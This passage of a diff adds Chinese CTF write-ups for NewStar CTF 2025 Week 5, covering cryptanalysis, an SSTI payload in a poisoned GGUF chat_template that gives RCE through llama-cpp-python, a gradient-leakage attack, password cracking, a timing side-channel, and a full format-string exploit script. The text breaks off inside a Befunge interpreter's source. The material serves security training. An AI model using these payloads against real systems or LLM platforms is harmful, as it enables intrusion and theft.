+S=sum(s[i]*x[i] for i in range(n)) +R=sum(s[i]*r[i] for i in range(n)) +print(S,R) +``` diff --git a/docs/wp/2025/week5/crypto/poly.md b/docs/wp/2025/week5/crypto/poly.md new file mode 100644 index 0000000..bb030d8 --- /dev/null +++ b/docs/wp/2025/week5/crypto/poly.md @@ -0,0 +1,51 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# Poly + + + +本题考查 Groebner 基。 + + +参考 EXP: + +```python + +def l2b(n: int, length: int = None) -> bytes: +# 略 + +def b2l(b: bytes) -> int: +# 略 + +#-------- 题目脚本 ------ +import uuid +p = random_prime(2**256) +f=f"FLAG{{{uuid.uuid4()}}}" +x1=f[:len(f)//2] +x2=f[len(f)//2:] +m1 = b2l(x1.encode()) +m2 = b2l(x2.encode()) +c1 = (m1^19+m1^18+4*m1^17)%p +c2 = (5*m2^19+m2^18+4*m2^17)%p +s = (m1^7*m2^2+m2)%p +print((p,c1,c2,s)) + +#-------- 解题脚本 --------- +R = PolynomialRing(Zmod(p), 'x, y') +x, y = R.gens() +I = Ideal([x^19+x^18+4*x^17-c1, 5*y^19+y^18+4*y^17-c2, x^7*y^2+y-s]) +for g in I.groebner_basis(): + print(g) + a=Zmod(p)(-g.univariate_polynomial()(0)) + print(l2b(int(a))) +``` + +简单来说,groebner基可以用来求多项式的公因式。 + +Gröbner基 方法是从任意一个多项式理想的一组给定生成元,计算另一组性质良好的生成元,并称为该理想的Gröbner基。它能用来判定任意多项式是否属于该理想。做密码题时,则使用该基简化运算来求解我们想要的。 diff --git a/docs/wp/2025/week5/crypto/smile-box.md b/docs/wp/2025/week5/crypto/smile-box.md new file mode 100644 index 0000000..aa642b9 --- /dev/null +++ b/docs/wp/2025/week5/crypto/smile-box.md @@ -0,0 +1,145 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# Smile 盒 + + + +本题考查差分攻击。 + + +其实容易知道加密过程是 2 轮 CipherFour + +> 此处原文引用了示意图,但图片文件未包含在压缩包中。 + +其中每条线代表一个比特,左边是高位。 +加密过程:16 比特明文与轮密钥 `key0` 异或,分为 4 块 4 比特,分块过 4-4 S 盒,然后进行比特拉线(也就是 P 置换,见下文)操作。再与轮密钥 `key1` 异或,分块过 S 盒,与轮密钥 `key2` 异或,输出密文。 +可以无限次输入明文来获取密文。如果猜中 `key2`(16 bit),即可得到 FLAG。 +注意,我们知道过 S 盒(`p=[self.S[i] for i in p]`)和 P 置换(`permute_bits(self, x)`)的过程。也就是说我们可以逆 S 盒和 P 置换。 + +然后就可以找差分了。这里差分定义为 $\Delta x=x_1\oplus x_2$ . + +为什么要找差分?因为我们知道,加密过程中,与轮密钥异或不影响差分($(m_1\oplus k_1)\oplus (m_2\oplus k_1)=m_1\oplus m_2$),P 置换是线性的,不影响差分(你自己验证),影响差分的只有 S 盒。如果我们能够通过研究 S 盒找到一个**高概率的差分**,就可以利用这个差分去攻击了。 + +怎么攻击呢? +让我们关注加密的最后一步: +`c = S(p) ^ key2` +其中`p`是进入最后一轮 S 盒之前的 16 位中间值。 +我们可以将这个等式拆分为 4 个独立的 4 bit : +`c_i = S(p_i) ^ key2_i` +(其中`i`= 0, 1, 2, 3)。然后,通过 S 盒的逆运算`S_`,我们可以恢复出`p_i`: +`p_i = S_(c_i ^ key2_i)` +现在,我们选择一对明文`(m1, m2)`,它们具有特定的差分`dm = m1 ^ m2`。这对明文经过加密后得到一对密文`(c1, c2)`。 +对于密钥`key2_i`的每一个可能猜测`k`(0-15),我们都可以计算出一对可能的`p`值: +`p_1_i = S_(c1_i ^ k)` +`p_2_i = S_(c2_i ^ k)` +然后计算它们的差分`dp = p_1_i ^ p_2_i`。 +而我们刚刚说要找的**高概率差分**,就是能对于特定的输入差分`dm`,在密码内部某个特定位置(比如 S 盒输入前)的差分`dp`会以一个很高的概率等于某个特定值。 +之后如果`dp`等于我们期望的**高概率差分**,就为这个密钥猜测`k`投上一票。 +在处理了大量明文对后,获得票数最高的那个密钥猜测`k`,就是最有可能的正确密钥的 4 bit。 + +接下来演示一下怎么找我们想要的包含高概率差分的差分路径: +首先先查差分分布表。 + +```python +def DDT(S): + n=len(S) + ddt = [[0] * n for _ in range(n)] + for di in range(n): + for m1 in range(n): + do=S[m1]^S[m1^di] + ddt[di][do]+=1 + return ddt + +ddt=DDT(S) +for row in ddt: + print(row) +``` + +> 此处原文引用了示意图,但图片文件未包含在压缩包中。 + +发现高概率差分:`0xb->0xc:8/16` ; `0xf->0x3:8/16` +(也就是: `0b1011 -> 0b1100` ; `0b1111 -> 0b0011` ) +然后搓路径: + +> 此处原文引用了示意图,但图片文件未包含在压缩包中。 + +可以看出我们找到了一条 `0x00b0 -> 0x00c0 -> 0x2000/0x0200` 的路径,其中差分 `0x2` 过S盒会有5种可能的输出差分(L), +所以我们在选取密文时要事先筛一遍。 + +我们以 `key2` 高 4 bit 为例讲讲怎么攻击: +选择差分为 `0x00b0` 的明文对 `m1,m2` 输入,然后获取密文 `c1,c2`,筛选密文差分高 4 bit 在 L 里面的。使用筛后的密文(当然我们只需要取高4 bit就可以了)猜 `key2` 高4 bit:直接爆破 `0->15`,检验 `S_(c1^key) ^ S_(c2^key)==0x2`,如果通过则给可能的记上一票。最后选择票数最高的。 + +一个仅供参考的脚本: + +```python +from pwn import remote +from tqdm import tqdm + +HOST,PORT="", ????? +io1=remote(HOST, PORT, timeout=10) + +print(io1.recvline().decode()) + +def enc(io,input): # 获取密文 + io.sendline(input.encode()) + ouput=io.recvline().decode()[-7:] + return int(ouput,16) + +S=(13, 11, 6, 5, 2, 7, 3, 4, 9, 0, 10, 1, 12, 15, 8, 14) +S_={x:i for i,x in enumerate(S)} # 逆 S 盒 + +def recover(dm,dc,index,tries,io): + """ + dm: 明文差分 + dc: 密文可能差分,用于筛选 + index: for recover key[index], 4 bit in one. + tries: 尝试次数 + io: 交互实例 + """ + key=[0]*16 # 投票计数置全零 + for m1 in tqdm(range(tries)): + m2=m1^dm + c1=enc(io,hex(m1)) + c2=enc(io,hex(m2)) + t=4*(3-index) # 控制索引 + c1_=((c1>>t)&0xF) # 取某 4 位 + c2_=((c2>>t)&0xF) + if c1_ ^ c2_ in dc: # 筛密文 + for k in range(16): # 猜 key 某 4 位 + cc1=S_[c1_^k] # 密文逆回去 + cc2=S_[c2_^k] + dcc=cc1^cc2 + if dcc==0x2: # 检验是否符合我们找到的差分 + key[k]+=1 # 投一票 + else: + continue + print(key) # 手动观察是否有假阳性密钥,如果有需要手动改 tries + maxv=max(key) + dic={v:i for i,v in enumerate(key)} + return dic[maxv] + +dm1=0x00b0 +dm2=0x00f0 +dc0=[0x1,0x3,0x4,0xb,0xe] + +key0=recover(dm1,dc0,0,2**11,io1) +key1=recover(dm1,dc0,1,2**10,io1) +key2=recover(dm2,dc0,2,2**10,io1) +key3=recover(dm2,dc0,3,2**10,io1) + +key_=(key0 << 12) | (key1 << 8) | (key2 << 4) | key3 # 拼接 +print(hex(key_)) + +io1.sendline("k".encode()) +print(io1.recvline().decode()) +io1.sendline(hex(key_).encode()) +print(io1.recvline().decode()) + +io1.close() +``` diff --git a/docs/wp/2025/week5/index.md b/docs/wp/2025/week5/index.md new file mode 100644 index 0000000..f151132 --- /dev/null +++ b/docs/wp/2025/week5/index.md @@ -0,0 +1,9 @@ +--- +title: WriteUp +titleTemplate: ":title - NewStar CTF 2025" +comments: false +--- + +# WriteUp - NewStar CTF 2025 + +这里是 NewStar CTF 2025 Week 5 的官方 WriteUp 页面。 diff --git a/docs/wp/2025/week5/misc/ai-hacker.md b/docs/wp/2025/week5/misc/ai-hacker.md new file mode 100644 index 0000000..0811e2e --- /dev/null +++ b/docs/wp/2025/week5/misc/ai-hacker.md @@ -0,0 +1,122 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# AI HACKER + +> SafeLLM Hub 一点都不 Safe :((访问/FLAG 获取题目任务) + +这道题的知识点是 GGUF 投毒导致的 SSTI 注入,《Deep leakage by gradients》 + +首先到主界面,我们发现题目给了一个内置模型,并且用户可以自己上传 GGUF 格式的模型并与 LLM 模型交互。 +不少选手可能会认为这题是 Prompt Injection。 + +但是经过一系列探索,这个 LLM 已经无法回答普通的大整数加法问题。据题目提示,我们要在指定目录下放置一个 `orange` 文件。 + +经过探索,在 `/api/info` 下可以发现该平台泄露的组件版本信息。 +![上传提示词文件](/assets/images/wp/2025/week5/ai-hacker_1.png) + +通过搜索,我们发现 llama-cpp-python 出现过一个加载模型导致的漏洞(CVE-2024-34359)。 +我们找到发现该漏洞的作者写的 [文章](https://0reg.dev/blog/from-gguf-model-format-metadata-rce-to-state-of-the-art-nlp-project-rces) + +阅读文章后,可以大致了解攻击手法:通过修改 `chat_template` 段的数据导致 SSTI 注入,最后 RCE 来创建文件。构造如下 EXP: + +```bash +{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("touch /tmp/xxxxxxxxxxxx/orange")}}{%endif%}{% endfor %} +``` + +![模型返回分析结果](/assets/images/wp/2025/week5/ai-hacker_2.png) + +成功拿到 `flag1` 和 `flag2` 的地址。 + +![提示词注入结果](/assets/images/wp/2025/week5/ai-hacker_3.png) + +`flag2` 是一个 pth 文件,使用 Netron 加载并观察模型参数。 +![获得 AI 题 FLAG](/assets/images/wp/2025/week5/ai-hacker_4.png) +从命名可以看出来 这里主要想考查梯度泄露攻击,共有12个客户端 我们一个个处理即可 +网上有不少相关exp 我们稍作修改即可 + +```python +import torch +import torch.nn as nn +import torch.optim as optim +import matplotlib.pyplot as plt + +def simple_multi_attack(model_path): + checkpoint = torch.load(model_path, map_location='cpu') + + class SimpleModel(nn.Module): + def __init__(self): + super().__init__() + self.conv_layers = nn.Sequential( + nn.Conv2d(3, 32, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2), + nn.Conv2d(32, 64, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2), + nn.Conv2d(64, 64, 3, padding=1), nn.ReLU() + ) + self.classifier = nn.Sequential( + nn.Flatten(), + nn.Linear(64 * 8 * 8, 128), nn.ReLU(), + nn.Linear(128, 10) + ) + + def forward(self, x): + x = self.conv_layers(x) + return self.classifier(x) + + model = SimpleModel() + model.load_state_dict(checkpoint['model_state_dict']) + model.eval() + + gradients = checkpoint['client_gradients'] + + print(f"开始攻击 {len(gradients)} 个客户端") + + for client_idx, grad in enumerate(gradients): + print(f"\n 攻击客户端 {client_idx}...") + for round_idx in range(10): + print(f" 第 {round_idx + 1} 轮") + + if round_idx == 0: + dummy_data = torch.randn(1, 3, 32, 32, requires_grad=True) + else: + dummy_data = current_data + torch.randn_like(current_data) * 0.1 + dummy_data = torch.clamp(dummy_data, 0, 1) + dummy_data.requires_grad_(True) + + dummy_label = torch.randn(1, 10, requires_grad=True) + optimizer = optim.LBFGS([dummy_data, dummy_label], lr=0.1) + + for step in range(100): + def closure(): + optimizer.zero_grad() + pred = model(dummy_data) + loss = nn.functional.cross_entropy(pred, dummy_label.softmax(dim=1)) + dummy_grad = torch.autograd.grad(loss, model.parameters(), create_graph=True) + + grad_diff = 0 + for g1, g2 in zip(dummy_grad, grad): + if g2 is not None: + grad_diff += ((g1 - g2) ** 2).sum() + + grad_diff.backward() + return grad_diff + + optimizer.step(closure) + dummy_data.data = torch.clamp(dummy_data.data, 0, 1) + + current_data = dummy_data.data.clone() + + # 显示每轮结果 + image = current_data.detach().squeeze().permute(1, 2, 0).cpu().numpy() + image = (image - image.min()) / (image.max() - image.min()) + + plt.figure(figsize=(3, 3)) + plt.imshow(image) + plt.title(f"Client {client_idx} - Round {round_idx + 1}") + plt.axis('off') + plt.show() + + print("攻击完成!请查看图像并记录字符") + +simple_multi_attack('pth path') +``` diff --git a/docs/wp/2025/week5/misc/intbug-chain.md b/docs/wp/2025/week5/misc/intbug-chain.md new file mode 100644 index 0000000..4719e6a --- /dev/null +++ b/docs/wp/2025/week5/misc/intbug-chain.md @@ -0,0 +1,32 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 区块链:INTbug + +在 `usePoints()` 函数的 `unchecked` 代码块中: + +```plaintext +unchecked { + totalPoints -= points; + userSpentPoints[msg.sender] -= points; +} +``` + +**初始状态**:每个用户调用 `addPoints()` 或 `usePoints()` 时,如果 `userSpentPoints[msg.sender]` 为 0,会被设置为 1000。 + +如果满足 uncheckd 下方判断,则会触发解锁 + +```plaintext +if (userSpentPoints[msg.sender] > 1000) { + unlocked[msg.sender] = true; +} +``` + +也就是说,只要使用的点数大于 1000,就可以触发解锁 + +我们在 `addPsoints` 中输入大于 1000 的数,`addPoints` 执行后再进行 `usePoints` 大于 1000 的数即可 + +![整数溢出调用链](/assets/images/wp/2025/week5/intbug-chain_1.png) + +点击 `getFlag`,即可得到 FLAG diff --git a/docs/wp/2025/week5/misc/mikumiku-1.md b/docs/wp/2025/week5/misc/mikumiku-1.md new file mode 100644 index 0000000..7163e23 --- /dev/null +++ b/docs/wp/2025/week5/misc/mikumiku-1.md @@ -0,0 +1,23 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 应急响应:把你 mikumiku 掉(1) + +我们查看 tomcat 的版本信息,可以得到,版本号为 `9.0.98` + +![Windows 日志文件](/assets/images/wp/2025/week5/mikumiku-1_1.png) + +我们搜索 `tomcat9.0.98 cve` 可以搜索到编号为 `CVE-2025-24813` 的历史漏洞 + +![筛选异常登录事件](/assets/images/wp/2025/week5/mikumiku-1_2.png) + +结合日志,可以确定使用的 cve + +```plaintext +cat localhost_access_log.2025-10-17.txt +``` + +![定位 RDP 登录 IP](/assets/images/wp/2025/week5/mikumiku-1_3.png) + +**CVE-2025-24813** diff --git a/docs/wp/2025/week5/misc/mikumiku-2.md b/docs/wp/2025/week5/misc/mikumiku-2.md new file mode 100644 index 0000000..b3bb0ef --- /dev/null +++ b/docs/wp/2025/week5/misc/mikumiku-2.md @@ -0,0 +1,27 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 应急响应:把你 mikumiku 掉(2) + +结合上题的日志,可以得知 `mikuu.jsp`,我们查看 `mikuu.jsp` + +![事件日志中的命令执行](/assets/images/wp/2025/week5/mikumiku-2_1.png) + +可以分析出该木马连接密码为 `miiikuuu` + +我们查看 `/etc/shadow` 文件,可以看到一个名为 `mikuu` 的用户 + +![发现恶意程序路径](/assets/images/wp/2025/week5/mikumiku-2_2.png) + +可以从 `$y` 中得知他是 `yescrypt` 密码 + +该类型的密码无法使用 `hashcat`,而 `john` 的效率太低,我们在github上可以看到 [yescrypt_crack](https://github.com/cyclone-github/yescrypt_crack/releases/tag/v0.2.0) 项目 + +我们配完 go 环境,装依赖,再 go bulid,根据 tips,我们生成由 miku 四个字符构成的密码本 + +```bash +./yescrypt_crack.exe -h hash.txt -w ezdict.txt -t 16 -s 10 +``` + +爆破得到 miiiku diff --git a/docs/wp/2025/week5/misc/mikumiku-3.md b/docs/wp/2025/week5/misc/mikumiku-3.md new file mode 100644 index 0000000..7065d82 --- /dev/null +++ b/docs/wp/2025/week5/misc/mikumiku-3.md @@ -0,0 +1,56 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 应急响应:把你 mikumiku 掉(3) + +进入 `/home/mikuu`,可以看到恶意程序和被加密的 `flag.miku`。 + +![恶意程序与加密文件](/assets/images/wp/2025/week5/mikumiku-3_1.png) + +使用 FTP 将文件传到本地,并用 IDA 打开 `mikumikud` 进行分析。 + +![mikumikud 反编译分析](/assets/images/wp/2025/week5/mikumiku-3_2.png) + +可以看出这是一个 AES 加密程序,分析 `key` 和 IV 后即可编写解密脚本。 + +```plaintext +AES_set_encrypt_key(v13, 128LL, v10) +``` + +可以得出 `v13` 数组为 `key`。需要注意小端序低字节在前,因此 `key` 为: + +```plaintext +12 34 56 78 9A BC DE F0 11 22 33 44 55 66 77 88 +``` + +IV 来自 `ptr` 和 `v12` 变量: + +```asm +unsigned __int64 ptr; // [rsp+930h] [rbp-50h] +__int64 v12; // [rsp+938h] [rbp-48h] +ptr = 0xEF40511401811919LL; +v12 = 0x1032547698BADCFELL; +``` + +在加密过程中,IV 被写入文件开头。 + +```plaintext +fwrite(&ptr, 1uLL, 0x10uLL, s); // 写入16字节:ptr(8字节) + v12(8字节) +``` + +知道 `key` 和 IV 后,编写脚本运行即可还原 FLAG。 + +```python +from Crypto.Cipher import AES + +key = bytes.fromhex('123456789ABCDEF01122334455667788') +with open('flag.miku', 'rb') as f: + iv = f.read(16) + ciphertext = f.read() + +cipher = AES.new(key, AES.MODE_CBC, iv) +plaintext = cipher.decrypt(ciphertext) +pad_len = plaintext[-1] +print(plaintext) +``` diff --git a/docs/wp/2025/week5/misc/time-hacker.md b/docs/wp/2025/week5/misc/time-hacker.md new file mode 100644 index 0000000..e66adc6 --- /dev/null +++ b/docs/wp/2025/week5/misc/time-hacker.md @@ -0,0 +1,125 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# TIME HACKER + +> 我所害怕的,只有时间 + +> [Misc] TIME HACKER.zip + +这道题的知识点包含侧信道攻击、时间戳隐写和 EXIF 信息读取。 + +首先将压缩包文件拖入 010 Editor,发现文件尾部存在冗余的 Base64 编码数据,解码后可得到提示信息: + +> I heard you can hack the time in different dimensions? + +![压缩包尾部冗余数据](/assets/images/wp/2025/week5/time-hacker_1.png) +![Base64 解码提示](/assets/images/wp/2025/week5/time-hacker_2.png) +下面继续分析该提示的含义。 + +`password_checker.exe` 用于校验压缩包密码是否正确。 +![password_checker 程序](/assets/images/wp/2025/week5/time-hacker_3.png) +直接逆向该程序获取密码并不现实,因为该 exe 加了 VMProtect 壳。 + +我们再把 FLAG.zip 文件拖入 010 尾部依旧存在冗余数据,解码后可获得提示 + +![FLAG.zip 尾部提示](/assets/images/wp/2025/week5/time-hacker_4.png) + +> The password is ten digits + +![密码长度提示](/assets/images/wp/2025/week5/time-hacker_5.png) +此时可以考虑直接爆破密码,但 ARCHPR 预估时间达到 7 天,无法在比赛时间内完成。 + +因此,前面提示中「hack the time」指向的是通过侧信道时间攻击获取压缩包密码。 + +输入密码后,程序会延迟一段时间再输出正确或错误,这正是漏洞所在。经过测试,可以推测后端校验逻辑大致如下: + +```python +a = input() +def checker(a): + if len(a) != len(secret): + return False + for i in range(len(a)): + if(a[i] != secret[i]): + (some operations that make time pass.) + return False + return True +``` + +因此只需要编写脚本反复调用 `password_checker.exe`,按响应时间逐位爆破密码即可。 + +```python +import time +import subprocess + +def crack_password(): + password = "" + exe_path = "exe_path" + for i in range(10): + times = {} + for c in "0123456789": + test = password + c + '0' * (9 - i) + total_time = 0 + + for _ in range(3): + start = time.time() + subprocess.run([exe_path], input=test.encode(), capture_output=True) + total_time += time.time() - start + times[c] = total_time / 3 + print(times) + best_char = max(times, key=times.get) + password += best_char + print(f"第{i+1}位: {best_char} -> {password}") + print(f"密码: {password}") + return password + +if __name__ == "__main__": + crack_password() +``` + +得到密码 `2145768093`。 + +> 有选手通过猜测密码与被压缩文件的时间戳有关,在其时间戳附近爆破也得到了密码;这实际上与下一阶段有关。 + +观察解压后的图片。 +![解压后的图片文件](/assets/images/wp/2025/week5/time-hacker_6.png) + +> 一个文件包含三个时间:创建时间、访问时间、修改时间。 + +可以注意到修改时间异常,推测出题人通过该时间隐藏了信息。将其转换为时间戳后发现与密码值相差不大,因此很可能通过二者差值隐藏信息。打印差值: + +```python +import os +import time + +for i in range(1,37): + mTime = os.stat(f"D://CTF//newstar//newstar2025 misc wp//[Misc] TIME HACKER//FLAG//{i}.png").st_mtime + print(chr(int(mTime)-2145768093),end="") +``` + +此时已经能看出 FLAG 字符,但字符顺序不正确。图片的 EXIF 信息也是常见的信息隐藏载体,因此可以从 EXIF 中读取文件顺序。最终脚本如下: + +```python +import piexif +from PIL import Image +import os +import time + +def exif_read(file_path): + img = Image.open(file_path) + exif_dict = piexif.load(img.info["exif"]) + return exif_dict["Exif"][36867][-2:] +shunxu = [] +for i in range(1,37): + shunxu.append(int(exif_read(f"pngpath"))) +print(shunxu) +FLAG = [""] * 50 +for i in range(1,37): + mTime = os.stat(f"pngpath").st_mtime + print(mTime) + FLAG[shunxu[i-1]] = chr(int(mTime)-2145768093) +strr = "".join(FLAG) +print(strr) +#FLAG{Y0u_4re_tHe_ReaL_TIME_H@cker!!} +``` diff --git a/docs/wp/2025/week5/pwn/fuduji-back.md b/docs/wp/2025/week5/pwn/fuduji-back.md new file mode 100644 index 0000000..bb52ec1 --- /dev/null +++ b/docs/wp/2025/week5/pwn/fuduji-back.md @@ -0,0 +1,159 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 复读机堂堂归来!复读机堂堂归来! + + + +本题考查非栈上格式化字符串漏洞的泄露与覆盖。 + + +## fmt&got + +对于常规的栈上格式化字符串漏洞,可以任意构造自己的恶意数据来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针,此时,我们需要利用栈上的残留数据。 + +开始之前,可以先了解 PIE 保护: + +- [Linux 保护机制](https://zhuanlan.zhihu.com/p/666340476) + +首先查看 `checksec`: + +```yaml +RELRO: Full RELRO +Stack: Canary found +NX: NX enabled +PIE: PIE enabled +SHSTK: Enabled +IBT: Enabled +Stripped: No +``` + +注意 `Full RELRO` 和 `PIE enabled`,这次无法直接写 GOT。接下来使用 IDA 分析。 + +![IDA 查看输入逻辑](/assets/images/wp/2025/week5/fuduji-back_1.png) + +与 Week 3 的题目类似,但本题输入位置在 bss 段。由于输入不在栈上,无法直接布置目标地址进行泄露或覆盖,因此需要借助栈上残留的栈地址,覆盖 `main` 函数返回地址。同时,程序中存在用于读取 FLAG 的 `win` 函数。 + +![win 函数](/assets/images/wp/2025/week5/fuduji-back_2.png) + +先 patch 程序,然后在 GDB 中调试,仍然停在 `printf` 之前。由于程序开启了 PIE 保护,需要先泄露 `PIE_base`,用来计算 `win` 函数的真实地址。方法与泄露 `libc_base` 类似:先泄露程序中某个函数地址,再减去其固定偏移。 + +![GDB 泄露 main 地址](/assets/images/wp/2025/week5/fuduji-back_3.png) +可以看到栈上残留了 `main` 地址,利用它即可泄露 `PIE_base`。 + +因为需要修改 `main` 函数的返回地址,而返回地址位于栈上,所以还需要一个栈地址。这里选择 `rsp` 指向的栈地址,减去 `0x98` 即为 `main` 返回地址所在位置。利用 `rsp` 处的栈地址修改其指向地址的末尾两字节,使其指向 `main` 返回地址。相关代码如下: + +```python +p.sendlineafter('说话!\n',b'%11$p') +main = int(p.recv(14),16) +pie_base = main - 0x00000000000138A +elf.address = pie_base + +p.sendlineafter('说话!\n',b'%6$p') +stack_addr = int(p.recv(14),16) +ret_addr = stack_addr - 0x98 +``` + +首先泄露 `PIE_base` 和栈地址。`0x00000000000138A` 这个值可以在 IDA 中找到,也可以使用 `elf.sym.main` 代替。 + +![IDA 查看 main 偏移](/assets/images/wp/2025/week5/fuduji-back_4.png) + +然后构造如下 payload: + +```python +payload ='%'+str((ret_addr)&0xffff)+'c%6$hn' +p.sendlineafter('说话!\n',payload) +``` + +让 `rsp` 上的栈地址指向 `main` 函数返回地址所在的栈地址,效果如下: +![调整栈指针链](/assets/images/wp/2025/week5/fuduji-back_5.png) +接着找到 `rsp` 上的栈地址对应的偏移,利用该栈地址直接修改 `main` 函数返回地址。 + +这里每次写入两个字节,可以利用 `rsp -> stack_addr -> main_ret_addr` 这条链覆盖 `main` 函数返回地址。 + +```python +payload = '%' + str((win)&0xffff) + 'c%26$hn' +p.sendlineafter('说话!\n',payload) + +payload ='%'+str((ret_addr + 2 )&0xffff)+'c%6$hn' +p.sendlineafter('说话!\n',payload) + +payload = '%' + str((win>>16)&0xffff) + 'c%26$hn' +p.sendlineafter('说话!\n',payload) + +payload ='%'+str((ret_addr + 4 )&0xffff)+'c%6$hn' +p.sendlineafter('说话!\n',payload) + +payload = '%' + str(((win>>16)>>16)&0xffff) + 'c%26$hn' +p.sendlineafter('说话!\n',payload) + +p.sendlineafter('说话!\n','end') +``` + +第一次修改 `main` 函数返回地址的末尾两字节。 +![第一次覆盖返回地址](/assets/images/wp/2025/week5/fuduji-back_6.png) +第二次将指向 `main` 函数返回地址的栈地址向后移动 2 字节。 +![移动返回地址指针](/assets/images/wp/2025/week5/fuduji-back_7.png) +第三次继续写入两字节。 +![继续覆盖返回地址](/assets/images/wp/2025/week5/fuduji-back_8.png) +以此类推,直至 `main` 函数返回地址完全被覆盖,最终效果如下: +![返回地址覆盖结果](/assets/images/wp/2025/week5/fuduji-back_9.png) +最后输入 `end`,让 `main` 函数返回到构造好的 `win` 函数。 + +面对开启 PIE 保护的程序,如果想提前下断点,例如在 `printf` 处: +![PIE 程序断点位置](/assets/images/wp/2025/week5/fuduji-back_10.png) +可以先在 IDA 中找到对应偏移地址,再在 GDB 中使用 `b *$rebase(0x140A)` 下断点。 + +完整 EXP: + +```python +from pwn import * + +context(arch='amd64', log_level = 'debug',os = 'linux') +file='/mnt/c/Users/Z2023/Desktop/bss_fmt' +elf=ELF(file) + +port= +ns = '' +p = remote('',port) +# p = process(file) + +gdb.attach(p,'b *$rebase(0x140A)') + +p.sendlineafter('说话!\n',b'%11$p') +main = int(p.recv(14),16) +pie_base = main - 0x00000000000138A +elf.address = pie_base + +win = elf.sym['win'] + +p.sendlineafter('说话!\n',b'%6$p') +stack_addr = int(p.recv(14),16) +ret_addr = stack_addr - 0x98 + +payload ='%'+str((ret_addr)&0xffff)+'c%6$hn' +p.sendlineafter('说话!\n',payload) + +payload = '%' + str((win)&0xffff) + 'c%26$hn' +p.sendlineafter('说话!\n',payload) + +payload ='%'+str((ret_addr + 2 )&0xffff)+'c%6$hn' +p.sendlineafter('说话!\n',payload) + +payload = '%' + str((win>>16)&0xffff) + 'c%26$hn' +p.sendlineafter('说话!\n',payload) + +payload ='%'+str((ret_addr + 4 )&0xffff)+'c%6$hn' +p.sendlineafter('说话!\n',payload) + +payload = '%' + str(((win>>16)>>16)&0xffff) + 'c%26$hn' +p.sendlineafter('说话!\n',payload) + +p.sendlineafter('说话!\n','end') +p.interactive() +``` diff --git a/docs/wp/2025/week5/pwn/go-question.md b/docs/wp/2025/week5/pwn/go-question.md new file mode 100644 index 0000000..20e2a30 --- /dev/null +++ b/docs/wp/2025/week5/pwn/go-question.md @@ -0,0 +1,359 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# go? + +一个 befunge 解释器,内置了一小段代码 + +### 源码 + +```c +#include +#include +#include +#include + +#define WIDTH 80 +#define HEIGHT 25 +#define STACK_INIT_CAP 1024 + +typedef enum { + DIR_RIGHT, + DIR_LEFT, + DIR_UP, + DIR_DOWN +} Direction; + +void init() +{ + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); +} + +long stack_arr[256]; +char grid[HEIGHT][WIDTH]; +int stack_size = 0; + +void push(long v) { + stack_arr[stack_size++] = v; +} + +long pop_() { + if (stack_size > 0) { + return stack_arr[--stack_size]; + } else { + return 0; + } +} + +void pop2(long *a, long *b) { + *a = pop_(); + *b = pop_(); +} + +void interpret() { + int x = 0, y = 0; + Direction dir = DIR_RIGHT; + int string_mode = 0; + + srand((unsigned)time(NULL)); + + while (1) { + char instr = grid[y][x]; + + if (string_mode) { + if (instr == '"') { + string_mode = 0; + } else { + push((long)instr); + } + } else { + if (isdigit((unsigned char)instr)) { + push(instr - '0'); + } else { + switch (instr) { + case '+': { + long a, b; + pop2(&a, &b); + push(b + a); + } break; + case '-': { + long a, b; + pop2(&a, &b); + push(b - a); + } break; + case '*': { + long a, b; + pop2(&a, &b); + push(b * a); + } break; + case '/': { + long a, b; + pop2(&a, &b); + if (a == 0) push(0); + else push(b / a); + } break; + case '%': { + long a, b; + pop2(&a, &b); + if (a == 0) push(0); + else push(b % a); + } break; + case '!': { + long a = pop_(); + push(a == 0 ? 1 : 0); + } break; + case '`': { + long a, b; + pop2(&a, &b); + push(b > a ? 1 : 0); + } break; + case '>': dir = DIR_RIGHT; break; + case '<': dir = DIR_LEFT; break; + case '^': dir = DIR_UP; break; + case 'v': dir = DIR_DOWN; break; + case '?': { + int r = rand() % 4; + dir = (Direction)r; + } break; + case '_': { + long a = pop_(); + dir = (a == 0 ? DIR_RIGHT : DIR_LEFT); + } break; + case '|': { + long a = pop_(); + dir = (a == 0 ? DIR_DOWN : DIR_UP); + } break; + case '"': { + string_mode = 1; + } break; + case ':': { + long a = pop_(); + push(a); + push(a); + } break; + case '\\': { + long a = pop_(); + long b = pop_(); + push(a); + push(b); + } break; + case '$': { + pop_(); + } break; + case '.': { + long a = pop_(); + printf("%ld", a); + } break; + case ',': { + long a = pop_(); + putchar((char)a); + } break; + case '#': { + switch (dir) { + case DIR_RIGHT: x = (x + 1) % WIDTH; break; + case DIR_LEFT: x = (x - 1 + WIDTH) % WIDTH; break; + case DIR_UP: y = (y - 1 + HEIGHT) % HEIGHT; break; + case DIR_DOWN: y = (y + 1) % HEIGHT; break; + } + } break; + case 'g': { + long y2 = pop_(); + long x2 = pop_(); + push((long)grid[y2][x2]); + } break; + case 'p': { + long x2 = pop_(); + long y2 = pop_(); + long v = pop_(); + grid[y2][x2] = (char)v; + } break; + case '@': { + return; + } + case '&': { + long v; + if (scanf("%ld", &v) == 1) { + push(v); + } else { + push(0); + } + } break; + case '~': { + int c = getchar(); + if (c == EOF) { + push(0); + } else { + push((long)c); + } + } break; + case ' ': + break; + default: + break; + } + } + } + switch (dir) { + case DIR_RIGHT: x = (x + 1) % WIDTH; break; + case DIR_LEFT: x = (x - 1 + WIDTH) % WIDTH; break; 